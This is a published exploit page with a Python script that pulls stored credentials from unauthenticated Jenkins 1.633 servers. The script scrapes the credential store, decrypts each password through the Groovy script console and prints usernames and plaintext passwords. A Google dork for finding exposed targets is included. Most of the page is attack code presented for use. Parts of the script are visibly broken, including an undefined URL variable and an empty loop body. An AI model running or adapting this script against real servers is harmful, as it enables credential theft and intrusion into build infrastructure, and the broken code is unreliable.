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Jenkins 1.633 - Unauthenticated Credential Recovery
来源:http://www.th3r3p0.com 作者:TheRepo 发布时间:2015-11-11  
# Exploit Title: Jenkins Unauthenticated Credential Recovery
# Disclosure Date: 10/14/2015
# Response Date: 10/14/2015
# Response: "Recommend this be rejected as a vulnerability."
# Full report including response: http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html
# Vendor Homepage: https://jenkins-ci.org/
# Tested on: Jenkins v1.633
# Author = 'Th3R3p0' | Justin Massey
# Google Dork: intitle:"Dashboard [Jenkins]" Credentials
import requests
import re
from BeautifulSoup import BeautifulSoup
import urllib
# Usage: Modify the URL below to match the target host and port
#   Must have trailing slash at end of URL
# makes request to gather all users with stored credentials
r= requests.get(url + 'credential-store/domain/_/')
soup = BeautifulSoup(r.text)
# loop to go through all hrefs and match the regex "credential" and add the urls to the users list
users = []
for link in soup.body.findAll('a', href=True):
    m = re.match("credential", link['href'])
    if m:
        if link['href'] not in users:
for users in users:
    r2 = requests.get(url + 'credential-store/domain/_/'+users+'/update')
    soup2 = BeautifulSoup(r2.text)
    # Finds the user and password value in html and stores in encPass variable
    user = soup2.body.findAll(attrs={"name" : "_.username"})[0]['value']
    encPass = soup2.body.findAll(attrs={"name" : "_.password"})[0]['value']
    # Encodes the password to www-form-urlencoded standards needed for the expected content type
    encPassEncoded = urllib.quote(encPass, safe='')
    # Script to run in groovy scripting engine to decrypt the password
    script = 'script=hudson.util.Secret.decrypt+%%27' \
             '%%27&json=%%7B%%22script%%22%%3A+%%22hudson.util.Secret.decrypt+%%27' \
             '%s' \
             '%%27%%22%%2C+%%22%%22%%3A+%%22%%22%%7D&Submit=Run' % (encPassEncoded, encPassEncoded)
    # Using sessions because the POST requires a session token to be present
    with requests.Session() as s:
        r3 = s.get(url+'script')
        headers = {'content-type': 'application/x-www-form-urlencoded'}
        r3 = s.post(url+'script',data=script, headers=headers)
    soup3 = BeautifulSoup(r3.text)
    # Extracts password from body
    password = soup3.body.findAll('pre')[1].text
    password = re.sub('Result:', '', password)
    print "User: %s | Password:%s" % (user, password)
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